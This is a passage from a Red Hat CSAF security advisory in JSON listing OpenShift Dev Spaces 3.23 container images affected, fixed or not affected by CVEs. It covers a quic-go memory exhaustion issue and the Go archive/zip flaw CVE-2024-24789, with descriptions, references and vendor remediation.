            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "quic-go: memory exhaustion attack against QUIC\u0027s connection ID mechanism"
    },
    {
      "cve": "CVE-2024-24789",
      "cwe": {
        "id": "CWE-20",
        "name": "Improper Input Validation"
      },
      "discovery_date": "2024-06-17T00:00:00+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2292668"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Golang. The ZIP implementation of the Go language archive/zip library behaves differently than the rest of the ZIP file format implementations. When handling ZIP files with a corrupted central directory record, the library skips over the invalid record and processes the next valid one. This flaw allows a malicious user to access hidden information or files inside maliciously crafted ZIP files.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "golang: archive/zip: Incorrect handling of certain ZIP files",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64"
        ],
        "known_not_affected": [
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2024-24789"
        },
        {
          "category": "external",
          "summary": "RHBZ#2292668",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2292668"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2024-24789",
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-24789"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-24789",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24789"
        }
      ],
      "release_date": "2024-06-04T00:00:00+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2025-09-15T16:27:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant to your system have been applied. For details on how to apply this update, refer to: https://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
